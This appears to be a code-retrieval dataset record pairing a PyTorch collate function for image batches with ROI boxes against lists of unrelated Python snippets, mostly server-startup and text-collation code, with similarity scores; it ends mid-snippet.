4\n # self.app.config['COMPRESS_MIN_SIZE'] = 300\n # Session support\n # self.session_interface = InMemorySessionInterface()\n # self.app.response_middleware.appendleft(self.save_session)\n # self.app.request_middleware.append(self.add_session_to_request)\n\n # self.add_routes()\n # return await self.app.create_server(loop=self.loop,\n # host='0.0.0.0',\n # port=self.port,\n # debug=False)", "async def main():\n await serve_websocket(handle_server, SERVER, PORT, ssl_context=None)", "def run(self):\r\n self.rpc_server.serve_forever(0.5)", "def run_simple_server(tb_app):\n # Mute the werkzeug logging.\n base_logging.getLogger('werkzeug').setLevel(base_logging.WARNING)\n\n try:\n server = serving.make_server(FLAGS.host, FLAGS.port, tb_app, threaded=True)\n server.daemon_threads = True\n except socket.error:\n if FLAGS.port == 0:\n msg = 'TensorBoard unable to find any open port'\n else:\n msg = (\n 'TensorBoard attempted to bind to port %d, but it was already in use'\n % FLAGS.port)\n logging.error(msg)\n print(msg)\n exit(-1)\n\n port = server.socket.getsockname()[1]\n msg = 'Starting TensorBoard %s at http://%s:%d' % (tb_app.tag, FLAGS.host,\n port)\n print(msg)\n logging.info(msg)\n print('(Press CTRL+C to quit)')\n sys.stdout.flush()\n\n server.serve_forever()", "def start_server():\n server = WebsocketServer(9001, host='0.0.0.0')\n server.set_fn_message_received(message_received)\n server.set_fn_client_left(client_left)\n print(\"Started\")\n server.run_forever()", "def start_server(self):\n self.logger.info(\"Starting WebSocket server on port %d\" % self.port)\n http_server = Thread(target=tornado.ioloop.IOLoop.instance().start)\n http_server.start()", "async def start(self) -> None:\n\n self._mode_supported = None\n self._hsm_supported = None\n\n try:\n await self._start_server()\n await self.load_devices()\n _LOGGER.debug(\"Connected to Hubitat hub at %s\", self.host)\n except aiohttp.ClientError as e:\n raise ConnectionError(str(e))\n\n try:\n await self._load_modes()\n self._mode_supported = True\n except Exception as e:\n self._mode_supported = False\n _LOGGER.warning(f\"Unable to access modes: {e}\")\n\n try:\n await self._load_hsm_status()\n self._hsm_supported = True\n except Exception as e:\n self._hsm_supported = False\n _LOGGER.warning(f\"Unable to access HSM status: {e}\")", "def run():\r\n log.debug('Starter::run()')\r\n try:\r\n # check specified port\r\n if not conf.port:\r\n raise Exception(\"Please specify port number! (use --port)\")\r\n Server(conf.port).run()\r\n except Exception as E:\r\n log.critical(E)", "def test_starts_http_api_server(self):\n options = ControlOptions()\n options.parseOptions(\n [b\"--port\", b\"tcp:8001\", b\"--data-path\", self.mktemp()])\n reactor = MemoryCoreReactor()\n ControlScript().main(reactor, options)\n server = reactor.tcpServers[0]\n port = server[0]\n factory = server[1].__class__\n self.assertEqual((port, factory), (8001, Site))", "def main() -> None:\n runner()\n asyncio.get_event_loop().run_forever()", "def main() -> None:\n runner()\n asyncio.get_event_loop().run_forever()", "def start(self, name=None):\n server = self.cloudman.get_server(name)['id']\n r = self.cloudman.compute.start_server(server)\n return r", "async def _start_server(self) -> None:\n # First, figure out what address to listen on. Open a connection to\n # the Hubitat hub and see what address it used. This assumes this\n # machine and the Hubitat hub are on the same network.\n with _open_socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.connect((self.host, 80))\n address = s.getsockname()[0]\n\n self._server = server.create_server(\n self._process_event, address, self.port or 0, self.ssl_context\n )\n self._server.start()\n _LOGGER.debug(\n \"Listening on %s:%d with SSL %s\",\n address,\n self._server.port,\n \"disabled\" if self.ssl_context is None else \"enabled\",\n )\n\n await self.set_event_url(self.event_url)", "def startFluidinfo():\n sudo('start fluidinfo-api')\n sudo('/etc/init.d/haproxy start')\n sudo('/etc/init.d/nginx start')", "def start(**kwargs):\n # Project\n\n CustomWSGI(\n app=\"stats.api.main:api\",\n options={\n \"worker_class\": \"uvicorn.workers.UvicornWorker\",\n \"preload\": True,\n \"keepalive\": 10,\n \"command\": shutil.which(\"gunicorn\"),\n \"bind\": \":\".join(\n (format_listen_address(params.listen_address), str(params.listen_port))\n ),\n \"workers\": workers,\n \"loglevel\": loglevel,\n \"accesslog\": \"-\",\n \"errorlog\": \"-\",\n # \"logconfig_dict\": {\"formatters\": {\"generic\": {\"format\": \"%(message)s\"}}},\n **kwargs,\n },\n ).run()", "def start_server(self):\n if self.esp_mgr.ap:\n self.server_socket = adafruit_esp32spi_socket.socket()\n self.esp_mgr.esp.start_server(23, self.server_socket.socknum)", "def start(self) -> None:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n self.wserver = websockets.serve(self.__producer_handler, port=self.port, loop=loop)\n try:\n # run server forever\n self.server = asyncio.get_event_loop()\n self.server.run_until_complete(self.wserver)\n self.server.run_forever()\n except Exception:\n self.close()\n\n loop.run_forever()", "def main():\r\n LOG.info('Starting server build.')\r\n web.run_app(init_app(),\r\n host=os.environ.get('APP_HOST', CONFIG.registry.get('app_host', '0.0.0.0')),\r\n port=int(os.environ.get('APP_PORT', CONFIG.registry.get('app_port', 8080))),\r\n shutdown_timeout=0,\r\n ssl_context=application_security())", "def _StartServer( self ):\n with self._gocode_lock:\n _logger.info( 'Starting Gocode server' )\n\n self._gocode_port = utils.GetUnusedLocalhostPort()\n self._gocode_host = '127.0.0.1:{0}'.format( self._gocode_port )\n\n command = [ self._gocode_binary_path,\n '-s',\n '-sock', 'tcp',\n '-addr', self._gocode_host ]\n\n if _logger.isEnabledFor( logging.DEBUG ):\n command.append( '-debug' )\n\n self._gocode_stdout = utils.CreateLogfile(\n LOGFILE_FORMAT.format( port = self._gocode_port, std = 'stdout' ) )\n self._gocode_stderr = utils.CreateLogfile(\n LOGFILE_FORMAT.format( port = self._gocode_port, std = 'stderr' ) )\n\n with utils.OpenForStdHandle( self._gocode_stdout ) as stdout:\n with utils.OpenForStdHandle( self._gocode_stderr ) as stderr:\n self._gocode_handle = utils.SafePopen( command,\n stdout = stdout,\n stderr = stderr )", "def start(verbose=False):\n\n _prepare_execution(verbose)\n _validate_components_prepared('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in components:\n if not component.skip_installation:\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start_server():\n server.bind(constants.ADDRESS)\n server.listen()\n print(\"Server listening on: \" + constants.HOST + \" on port \" + str(constants.PORT) + \"...\")", "def run_server():\n app = init_app()\n app.run(host=app.config['HOST'], port=app.config['PORT'])", "def _run(self) -> None:\n asyncio.set_event_loop(self._server_loop)\n self._server_loop.run_until_complete(self._runner.setup())\n\n site = web.TCPSite(\n self._runner, self.host, self.port, ssl_context=self.ssl_context\n )\n self._server_loop.run_until_complete(site.start())\n\n # If the Server was initialized with port 0, determine what port the\n # underlying server ended up listening on\n if self.port == 0:\n site_server = cast(AsyncioServer, site._server)\n sockets = cast(List[Socket], site_server.sockets)\n socket = sockets[0]\n self.port = socket.getsockname()[1]\n\n self._startup_event.set()\n self._server_loop.run_forever()", "async def serve_web(self):\n interface = \"0.0.0.0\" if settings.PUBLIC_ACCESS else \"127.0.0.1\"\n port = settings.WEB_PORT\n self.logger.info(f\"web: starting the server on {interface}:{port}...\")\n await self.runner.setup()\n site = aioweb.TCPSite(self.runner, interface, port)\n await site.start()\n self.preparing_task = None", "def run(self):\n server = TCPServer((self.host, self.port), TCPHandler)\n server.lymphocytes_getter = self.lymphocytes_getter\n\n #runs forever - so make this thread daemon\n server.serve_forever()", "def _start_server_process():\n from gevent import monkey\n monkey.patch_all()\n\n from tellapart.frontend import gevent_profiler\n from tellapart.frontend import util\n\n # In this example, profile 100% of requests.\n # In a production server, you'd typically profile far fewer.\n\n if USE_PYWSGI:\n profiler = gevent_profiler.Profiler(\n request_profiling_pct=1.0,\n request_info_class=gevent_profiler.PyWsgiServerRequestInfo)\n\n util.launch_gevent_wsgi_server(_do_stuff, 8088, 16, 'example server',\n use_pywsgi=True)\n else:\n profiler = gevent_profiler.Profiler(request_profiling_pct=1.0)\n util.launch_gevent_wsgi_server(_do_stuff, 8088, 16, 'example server')", "def start(self):\n self.watcher.start()\n self._asyncio_loop.run_forever()", "async def run_sever_async(host: str = \"0.0.0.0\", port: int = 8000):\n runner = web.AppRunner(app_factory())\n site = web.TCPSite(runner, host, port)\n print(f\"guix-python-app: Runing server on {host}:{port}\")\n print(f\">> try: curl http://{host}:{port}/ping\")\n await site.start()", "def start(self):\n assert(self._cbs is not None)\n self._as.start() # start the server", "def start_server(**params):\n\n def _grpc_server_async(options):\n call_command(\"grpcserver\", **options)\n\n port = 50000 + randint(0, 10000)\n params[\"port\"] = port\n # Start grpc server\n srv = threading.Thread(\n target=_grpc_server_async, args=[params]\n )\n srv.start()\n sleep(5)\n return \"localhost:%s\" % port", "def local_webserver_start():\n if not _is_webserver_running():\n local(_webserver_command())", "def handle(host: str = \"0.0.0.0\", port: int = 8080, reload: bool = True):\n host = fnc.get(\"server.host\", config, default=host)\n port = fnc.get(\"server.port\", config, default=port)\n reload = fnc.get(\"server.reload\", config, default=reload)\n\n if fnc.get(\"server.custom\", config):\n uvicorn.run(fnc.get(\"server.module\", config,\n default=\"server:app\"), host=host, port=port, reload=reload)\n else:\n uvicorn.run(\"nork.framework.server:app\",\n host=host, port=port, reload=reload)", "async def start(self):\n envs = self.user_env()\n self.remote_host = await self.start_ec2_instance(envs)\n \n # commenting this out till I have added aws networking within a subnet\n # port = await self.remote_random_port()\n port=int(os.getenv('REMOTE_PORT'))\n if port is None or port == 0:\n return False\n cmd = []\n\n cmd.extend(self.cmd)\n cmd.extend(self.get_args())\n\n if self.hub_api_url != \"\":\n old = \"--hub-api-url={}\".format(self.hub.api_url)\n new = \"--hub-api-url={}\".format(self.hub_api_url)\n for index, value in enumerate(cmd):\n if value == old:\n cmd[index] = new\n for index, value in enumerate(cmd):\n if value[0:6] == '--port':\n cmd[index] = '--port=%d' % (port)\n\n remote_cmd = ' '.join(cmd)\n\n remote_cmd = '/usr/local/bin/'+remote_cmd\n\n self.log.debug(\"Command issued to remote serve: {}\".format(remote_cmd))\n self.pid = await self.exec_notebook(remote_cmd)\n\n self.log.debug(\"Starting User: {}, PID: {}\".format(self.user.name, self.pid))\n\n if self.pid < 0:\n return None\n # DEPRECATION: Spawner.start should return a url or (ip, port) tuple in JupyterHub >= 0.9\n return (self.remote_host, int(port))", "def start(setup): #pragma: no cover\n import warnings\n warnings.warn(\"start() is deprecated, use run() instread\", DeprecationWarning)\n\n\n async def main():\n await setup()\n await initialize()\n try:\n tasks = []\n for hub in Hub.hubs:\n tasks.append(spawn(hub.run()))\n for task in tasks:\n await task\n finally:\n await finalize()\n loop = get_event_loop()\n loop.run_until_complete(main(program))", "def main():\n lgs = LifeGenServer()\n lgs.listening()", "def runserver():\n\tapp.run(host = '0.0.0.0', port = 5000)", "def start(verbose=False):\n\n _load_config_and_logger(verbose)\n _validate_manager_installed('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in COMPONENTS:\n if hasattr(component, 'start'):\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start(parse_opts):\n global opts\n opts = parse_opts\n app.run(host='0.0.0.0')", "def run(self):\n # Get the UUID so we can heartbeat to Ironic. Raises LookupNodeError\n # if there is an issue (uncaught, restart agent)\n self.started_at = _time()\n\n # Cached hw managers at runtime, not load time. See bug 1490008.\n hardware.load_managers()\n\n if not self.standalone:\n # Inspection should be started before call to lookup, otherwise\n # lookup will fail due to unknown MAC.\n uuid = inspector.inspect()\n\n content = self.api_client.lookup_node(\n hardware_info=hardware.dispatch_to_managers(\n 'list_hardware_info'),\n timeout=self.lookup_timeout,\n starting_interval=self.lookup_interval,\n node_uuid=uuid)\n\n self.node = content['node']\n self.heartbeat_timeout = content['heartbeat_timeout']\n\n wsgi = simple_server.make_server(\n self.listen_address[0],\n self.listen_address[1],\n self.api,\n server_class=simple_server.WSGIServer)\n\n if not self.standalone:\n # Don't start heartbeating until the server is listening\n self.heartbeater.start()\n\n try:\n wsgi.serve_forever()\n except BaseException:\n self.log.exception('shutting down')\n\n if not self.standalone:\n self.heartbeater.stop()", "def main():\n cfg.CONF(sys.argv[1:], project='blazar', prog='blazar-api')\n notifier.init()\n service_utils.prepare_service(sys.argv)\n if not CONF.enable_v1_api:\n app = v2_app.make_app()\n else:\n app = wsgi_app.VersionSelectorApplication()\n\n wsgi.server(eventlet.listen((CONF.host, CONF.port), backlog=500), app)", "def start():\n trio.run(_main)", "def run(self):\n run_simple(self.hostname, self.port, self.dispatch,\n use_reloader=self.debug)", "def start(self):\n super(EngineService, self).start()\n\n self.target = oslo_messaging.Target(server=self.service_id,\n topic=self.topic,\n version=self.version)\n\n self.server = messaging.get_rpc_server(self.target, self)\n self.server.start()", "def start_server(self):\n if not self._server:", "def start(self) -> None:\n if self.bolt_app.logger.level > logging.INFO:\n print(get_boot_message())\n else:\n self.bolt_app.logger.info(get_boot_message())\n\n web.run_app(self.web_app, host=\"0.0.0.0\", port=self.port)", "def start(self, logfile_name):\n\n self._verify_not_running()\n\n # The package structure for LiteServ is different pre 1.4. Handle for this case\n if has_dot_net4_dot_5(self.version_build):\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/net45/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n else:\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n\n process_args = [\n \"mono\",\n binary_path,\n \"--port\", str(self.port),\n \"--dir\", \"{}/dbs/net-mono/\".format(RESULTS_DIR)\n ]\n\n if self.storage_engine == \"ForestDB\" or self.storage_engine == \"ForestDB+Encryption\":\n process_args.append(\"--storage\")\n process_args.append(\"ForestDB\")\n else:\n process_args.append(\"--storage\")\n process_args.append(\"SQLite\")\n\n if self.storage_engine == \"SQLCipher\" or self.storage_engine == \"ForestDB+Encryption\":\n log_info(\"Using Encryption ...\")\n db_flags = []\n for db_name in REGISTERED_CLIENT_DBS:\n db_flags.append(\"--dbpassword\")\n db_flags.append(\"{}=pass\".format(db_name))\n process_args.extend(db_flags)\n\n log_info(\"Launching: {} with args: {}\".format(binary_path, process_args))\n\n self.logfile = open(logfile_name, \"w\")\n self.process = subprocess.Popen(args=process_args, stdout=self.logfile)\n\n self._verify_launched()\n\n return \"http://{}:{}\".format(self.host, self.port)", "async def startup(self):", "async def startup(self):", "def server():", "def server():", "def run_forever(self):\n self.app.run()" ]
[ "0.7084234", "0.6992241", "0.69815814", "0.6813422", "0.68041515", "0.6786285", "0.6786285", "0.6771331", "0.6730415", "0.669539", "0.6544975", "0.648505", "0.6399624", "0.63707113", "0.6362181", "0.63410026", "0.6337383", "0.6334539", "0.63275516", "0.63197315", "0.62906486", "0.6289428", "0.62887746", "0.6277157", "0.6223457", "0.61977243", "0.6194843", "0.6194075", "0.6179964", "0.6155654", "0.6151399", "0.6146561", "0.6136541", "0.61043555", "0.6088479", "0.6077522", "0.60752773", "0.60691214", "0.6051083", "0.60339296", "0.60083526", "0.6006535", "0.59996617", "0.59658784", "0.59658784", "0.59626335", "0.5947256", "0.5944621", "0.5930474", "0.59259087", "0.5922499", "0.5920323", "0.59071136", "0.59034455", "0.5884926", "0.5872637", "0.58724785", "0.5864107", "0.58625275", "0.58625275", "0.5841258", "0.5837941", "0.5837612", "0.58259463", "0.5817344", "0.58131903", "0.5811351", "0.5811329", "0.5808302", "0.5806056", "0.5799422", "0.5794119", "0.57938236", "0.578987", "0.57871866", "0.5777063", "0.57729244", "0.57708067", "0.57686687", "0.5767645", "0.57376945", "0.5734242", "0.57328725", "0.57314193", "0.57253855", "0.57227004", "0.5721925", "0.5714934", "0.570417", "0.5702657", "0.56942075", "0.5693917", "0.569107", "0.5684045", "0.56800246", "0.5669114", "0.5669114", "0.566263", "0.566263", "0.56625974" ]
0.6218118
25
Collation function to be used with data loaders
def collate(self, batch): images = [] indices = [] roi_size = 5 if self.Train else 4 rois = torch.zeros((len(batch), 20, roi_size), dtype=torch.float32) rois = rois.to(batch[0][1].device) for _b in range(len(batch)): # Accumulate patches: images.append(batch[_b][0].to(torch.float32)) indices.append(batch[_b][2]) # Accumulate ROI: """ image_num = torch.Tensor([_b]).expand(batch[_b][1].size(0)) image_num = image_num.type(batch[_b][1].dtype).view(-1,1) image_num = image_num.to(batch[_b][1].device) _roi = torch.cat([image_num, batch[_b][1]], dim=1) rois = torch.cat([rois, _roi], dim=0) """ num_boxes = batch[_b][1].size(0) rois[_b,:num_boxes,:] = batch[_b][1] # Stack outputs and return batch = [torch.stack(images, dim=0), rois, torch.Tensor(indices)] return batch
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def collation(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"collation\")", "def collation(self) -> str:\n return pulumi.get(self, \"collation\")", "def collation(self) -> str:\n return pulumi.get(self, \"collation\")", "def collation(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"collation\")", "def collation(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"collation\")", "def test_collation_register_twice(self):\n con = sqlite.connect(\":memory:\")\n con.create_collation(\"mycoll\", lambda x, y: (x > y) - (x < y))\n con.create_collation(\"mycoll\", lambda x, y: -((x > y) - (x < y)))\n result = con.execute(\"\"\"\n select x from (select 'a' as x union select 'b' as x) order by x collate mycoll\n \"\"\").fetchall()\n self.assertEqual(result[0][0], 'b')\n self.assertEqual(result[1][0], 'a')", "def collation(self) -> Optional[str]:\n return pulumi.get(self, \"collation\")", "def db_collations_choices(self):\n # To avoid pre-mature initialization of db-context.\n from django.db import connection\n\n with connection.cursor() as cursor:\n cursor.execute(\"SELECT collname, collcollate FROM pg_collation\")\n rows = cursor.fetchall()\n return ((name, \"{} ({})\".format(name, collate)) for name, collate in rows)", "def no_collation(x):\n return x", "def get_collation(self, col_id):\n for cs in self.charset_map:\n if int(col_id) == int(cs[ID]):\n return cs[COLLATION_NAME]\n return None", "def _init_collate(self, cfg: ConfigType) -> Callable:\n try:\n with FUNCTIONS.switch_scope_and_registry(self.scope) as registry:\n collate_fn = registry.get(cfg.test_dataloader.collate_fn)\n except AttributeError:\n collate_fn = pseudo_collate\n return collate_fn # type: ignore", "def catalog_collation(self) -> Optional[str]:\n return pulumi.get(self, \"catalog_collation\")", "def test_deregister_collation(self):\n con = sqlite.connect(\":memory:\")\n con.create_collation(\"mycoll\", lambda x, y: (x > y) - (x < y))\n con.create_collation(\"mycoll\", None)\n with self.assertRaises(sqlite.OperationalError) as cm:\n con.execute(\"select 'a' as x union select 'b' as x order by x collate mycoll\")\n self.assertEqual(str(cm.exception), 'no such collation sequence: mycoll')", "def collate_fn(data):\n # Sort by conversation length (descending order) to use 'pack_padded_sequence'\n data.sort(key=lambda x: x[1], reverse=True)\n\n # Separate\n sentences, conversation_length, sentence_length = zip(*data)\n\n # return sentences, conversation_length, sentence_length.tolist()\n return sentences, conversation_length, sentence_length", "def collate_fn(self, *args):\n return TupleMiniBatch(default_collate(*args))", "def use_locale(self, collation):\n loc = locale.getlocale(locale.LC_COLLATE)\n if collation == UNICODE_CODEPOINT_COLLATION:\n collation = 'en_US.UTF-8'\n\n try:\n locale.setlocale(locale.LC_COLLATE, collation)\n except locale.Error:\n raise self.error('FOCH0002', 'Unsupported collation %r' % collation)\n else:\n yield\n finally:\n locale.setlocale(locale.LC_COLLATE, loc)", "def get_default_collation(self, col_id):\n # Exception for utf8\n if col_id == 83:\n return \"utf8_bin\"\n for cs in self.charset_map:\n if int(cs[ID]) == int(col_id) and cs[IS_DEFAULT].upper() == \"YES\":\n return cs[COLLATION_NAME]\n return None", "def get_collations(self):\n collations = self.query(sql.all_collation)\n collation_charsets = {}\n for r in collations:\n collation_charsets[r[\"COLLATION_NAME\"]] = r[\"CHARACTER_SET_NAME\"]\n return collation_charsets", "def default_collation(self) -> str:\n return pulumi.get(self, \"default_collation\")", "def sort_by_unicode(self):\n utils.sort_unicode_word_list(self.words_new)", "def get_collation(self, collation_hash):\n try:\n collation_rlp = self.db.get(collation_hash)\n if collation_rlp == 'GENESIS':\n return Collation(CollationHeader())\n # if not hasattr(self, 'genesis'):\n # self.genesis = rlp.decode(self.db.get('GENESIS_RLP'), sedes=Block)\n # return self.genesis\n else:\n return rlp.decode(collation_rlp, Collation)\n except Exception as e:\n log.debug(\"Failed to get collation\", hash=encode_hex(collation_hash), error=str(e))\n return None", "def fn_s(fn):\r\n c.execute(\"SELECT * FROM personnel WHERE first=:first COLLATE NOCASE\", {'first': fn})\r\n return c.fetchall()", "def collate_fn(self, image_column_names: Optional[List] = None, per_gpu_batch_size: Optional[int] = None) -> Dict:\n fn = {}\n if self.requires_column_info:\n return NotImplementedError(\n f\"requires_column_info={self.requires_column_info} not implemented for OVD tasks.\"\n )\n\n fn.update(\n {\n self.image_key: PadCollator(pad_val=0),\n self.prompt_key: ListCollator(),\n self.image_meta_key: ListCollator(),\n }\n )\n return fn", "def collate_fn(batch):\n pad_index = 1 # the <PAD> index in vocabulary\n src_list = [sample[0] for sample in batch] # list of each language sentences\n trg_list = [sample[1] for sample in batch]\n\n def padding(sentence_list):\n \"\"\"padding each sentence to the right\"\"\"\n max_len = max([sentence.size(0) for sentence in sentence_list])\n pad_sen = [sen.tolist() + [pad_index] * max(0, max_len - len(sen))\n for sen in sentence_list]\n return torch.LongTensor(pad_sen).transpose(0, 1) # shape of (T, B)\n\n return padding(src_list), padding(trg_list)", "def get_collate_for_dataset(\n dataset: Union[Dataset, ConcatDataset], ensure_collate_fn_are_the_same: bool = True\n) -> Callable:\n collate_fn = default_collate\n\n if hasattr(dataset, \"get_collate_fn\"):\n return dataset.get_collate_fn()\n elif isinstance(dataset, ConcatDataset):\n collate_fns = [get_collate_for_dataset(ds) for ds in dataset.datasets]\n collate_fn = collate_fns[0]\n\n if ensure_collate_fn_are_the_same:\n for other_collate_fn in collate_fns[1:]:\n if type(other_collate_fn) != type(collate_fn):\n raise ValueError(\n f\"Detected ConcatDataset consist of datasets with different collate functions: {type(collate_fn)} and {type(other_collate_fn)}.\"\n )\n\n if isinstance(collate_fn, functools.partial):\n if not _partial_functions_equal(collate_fn, other_collate_fn):\n raise ValueError(\n f\"Detected ConcatDataset consist of datasets with different collate functions: {collate_fn} and {type(other_collate_fn)}.\"\n )\n elif collate_fn != other_collate_fn:\n raise ValueError(\n f\"Detected ConcatDataset consist of datasets with different collate functions: {collate_fn} and {other_collate_fn}.\"\n )\n\n collate_fn = collate_fns[0]\n\n return collate_fn", "def sortCaseInsensitive(*args, **kwargs)->List[AnyStr]:\n pass", "def custom_collate_fn(data):\n features, labels = zip(*data)\n return pack_sequence(features, enforce_sorted=False), torch.tensor(labels)", "def completer_func_cols(text, state):\n return [x for x in lc_keys if x.startswith(text)][state]", "def prepare(self):\n\n for i in range(len(self.__corpora)):\n string = self.__corpora[i]\n string = sub(r'[\\n\\t]| {2,}', ' ', string.lower())\n string = sub(r'[^{0}]'.format(self.alphabet + ' '), '', string)\n\n if self.lang == 'uk':\n string = sub(r'[ґ]', 'г', string)\n\n elif self.lang == 'ru':\n string = sub(r'[ё]', 'е', string)\n\n self.__corpora[i] = string", "def get_collate_fn(mixer_name: str, alpha: float) -> Callable:\n fn = cutmix if mixer_name == \"cutmix\" else mixup\n collate_fn = CustomCollate(alpha=alpha, mixer=fn)\n return collate_fn", "def russian_to_en(df_data):\n tranlate_file = {'region': 'russian_region_names_in_english.csv',\n 'city': 'russian_city_names_in_english.csv',\n 'parent_category_name': 'parent_product_categories.csv',\n 'category_name': 'product_categories.csv',\n 'param_1': 'param_1.csv',\n 'param_2': 'param_2.csv',\n 'param_3': 'param_3.csv'}\n \n # Iterate over input dataframe columns,\n # Use files from: www.kaggle.com/kaparna/translations/data, if possible.\n # For 'description' column, use translate module.\n for col in df_data.columns:\n file = tranlate_file.get(col, None) \n if file: \n # build up the mapping from Russian to English.\n file = pandas.read_csv(PATH+file)\n file.columns = ['rus', 'en']\n convert = {row['rus']: row['en'] for index, row in file.iterrows()}\n \n # translate column into English\n df_data[col] = df_data[col].map(convert, na_action='ignore')", "def get_name_by_collation(self, colname):\n for cs in self.charset_map:\n if cs[COLLATION_NAME] == colname:\n return cs[CHARACTER_SET_NAME]\n return None", "def find_abecedarian_words():\n pass", "def retranslate(self):\r\n pass", "def retranslate(self):\r\n pass", "def collate_fn(data):\n # Sort a data list by caption length\n images, captions, cap_mask, vision_mask, labels, vision_labels = zip(*data)\n\n images = torch.stack(images, 0)\n labels = torch.stack(labels, 0)\n vision_labels = torch.stack(vision_labels, 0).long()\n targets = torch.stack(captions, 0).long()\n cap_mask = torch.stack(cap_mask,0).long()\n vision_mask = torch.stack(vision_mask,0).long()\n\n return images, targets, cap_mask, vision_mask, labels, vision_labels", "def collate_fn(batch):\r\n names, images, annos = zip(*batch)\r\n images = default_collate(images)\r\n return names, images, annos", "def collate_fn(batch):\r\n names, images, annos = zip(*batch)\r\n images = default_collate(images)\r\n return names, images, annos", "def correctWord (w):\r\n if len(re.findall(r\"[а-я]\",w))>len(re.findall(r\"[a-z]\",w)):\r\n return w.translate(eng_rusTranslateTable)\r\n else:\r\n return w.translate(rus_engTranslateTable)", "def __init__(self, encoding):\n self.trans = {}\n for char in u\"ÀÁÂẦẤẪẨẬÃĀĂẰẮẴẶẲȦǠẠḀȂĄǍẢ\":\n self.trans[char] = u\"A\"\n for char in u\"ȀǞ\":\n self.trans[char] = u\"Ä\"\n self.trans[u\"Ǻ\"] = u\"Å\"\n self.trans[u\"Ä\"] = u\"Ae\"\n self.trans[u\"Å\"] = u\"Aa\"\n for char in u\"àáâầấẫẩậãāăằắẵặẳȧǡạḁȃąǎảẚ\":\n self.trans[char] = u\"a\"\n for char in u\"ȁǟ\":\n self.trans[char] = u\"ä\"\n self.trans[u\"ǻ\"] = u\"å\"\n self.trans[u\"ä\"] = u\"ae\"\n self.trans[u\"å\"] = u\"aa\"\n for char in u\"ḂḄḆƁƂ\":\n self.trans[char] = u\"B\"\n for char in u\"ḃḅḇƀɓƃ\":\n self.trans[char] = u\"b\"\n for char in u\"ĆĈĊÇČƇ\":\n self.trans[char] = u\"C\"\n for char in u\"ćĉċçčƈȼ\":\n self.trans[char] = u\"c\"\n self.trans[u\"Ḉ\"] = u\"Ç\"\n self.trans[u\"ḉ\"] = u\"ç\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ĎḊḌḎḐḒĐƉƊƋ\":\n self.trans[char] = u\"D\"\n for char in u\"ďḋḍḏḑḓđɖɗƌ\":\n self.trans[char] = u\"d\"\n for char in u\"ÈȄÉÊḚËĒḔḖĔĖẸE̩ȆȨḜĘĚẼḘẺ\":\n self.trans[char] = u\"E\"\n for char in u\"ỀẾỄỆỂ\":\n self.trans[char] = u\"Ê\"\n for char in u\"èȅéêḛëēḕḗĕėẹe̩ȇȩḝęěẽḙẻ\":\n self.trans[char] = u\"e\"\n for char in u\"ềếễệể\":\n self.trans[char] = u\"ê\"\n for char in u\"ḞƑ\":\n self.trans[char] = u\"F\"\n for char in u\"ḟƒ\":\n self.trans[char] = u\"f\"\n for char in u\"ǴḠĞĠĢǦǤƓ\":\n self.trans[char] = u\"G\"\n for char in u\"ǵḡğġģǧǥɠ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ĝ\"] = u\"Gx\"\n self.trans[u\"ĝ\"] = u\"gx\"\n for char in u\"ḢḤḦȞḨḪH̱ĦǶ\":\n self.trans[char] = u\"H\"\n for char in u\"ḣḥḧȟḩḫ̱ẖħƕ\":\n self.trans[char] = u\"h\"\n for char in u\"IÌȈÍÎĨḬÏḮĪĬȊĮǏİỊỈƗ\":\n self.trans[char] = u\"I\"\n for char in u\"ıìȉíîĩḭïḯīĭȋįǐiịỉɨ\":\n self.trans[char] = u\"i\"\n for char in u\"ĴJ\":\n self.trans[char] = u\"J\"\n for char in u\"ɟĵ̌ǰ\":\n self.trans[char] = u\"j\"\n for char in u\"ḰǨĶḲḴƘ\":\n self.trans[char] = u\"K\"\n for char in u\"ḱǩķḳḵƙ\":\n self.trans[char] = u\"k\"\n for char in u\"ĹĻĽḶḸḺḼȽŁ\":\n self.trans[char] = u\"L\"\n for char in u\"ĺļľḷḹḻḽƚłɫ\":\n self.trans[char] = u\"l\"\n for char in u\"ḾṀṂ\":\n self.trans[char] = u\"M\"\n for char in u\"ḿṁṃɱ\":\n self.trans[char] = u\"m\"\n for char in u\"ǸŃÑŅŇṄṆṈṊŊƝɲȠ\":\n self.trans[char] = u\"N\"\n for char in u\"ǹńñņňṅṇṉṋŋɲƞ\":\n self.trans[char] = u\"n\"\n for char in u\"ÒÓÔÕṌṎȬÖŌṐṒŎǑȮȰỌǪǬƠỜỚỠỢỞỎƟØǾ\":\n self.trans[char] = u\"O\"\n for char in u\"òóôõṍṏȭöōṑṓŏǒȯȱọǫǭơờớỡợởỏɵøǿ\":\n self.trans[char] = u\"o\"\n for char in u\"ȌŐȪ\":\n self.trans[char] = u\"Ö\"\n for char in u\"ȍőȫ\":\n self.trans[char] = u\"ö\"\n for char in u\"ỒỐỖỘỔȎ\":\n self.trans[char] = u\"Ô\"\n for char in u\"ồốỗộổȏ\":\n self.trans[char] = u\"ô\"\n for char in u\"ṔṖƤ\":\n self.trans[char] = u\"P\"\n for char in u\"ṕṗƥ\":\n self.trans[char] = u\"p\"\n self.trans[u\"ᵽ\"] = u\"q\"\n for char in u\"ȐŔŖŘȒṘṚṜṞ\":\n self.trans[char] = u\"R\"\n for char in u\"ȑŕŗřȓṙṛṝṟɽ\":\n self.trans[char] = u\"r\"\n for char in u\"ŚṤŞȘŠṦṠṢṨ\":\n self.trans[char] = u\"S\"\n for char in u\"śṥşșšṧṡṣṩȿ\":\n self.trans[char] = u\"s\"\n self.trans[u\"Ŝ\"] = u\"Sx\"\n self.trans[u\"ŝ\"] = u\"sx\"\n for char in 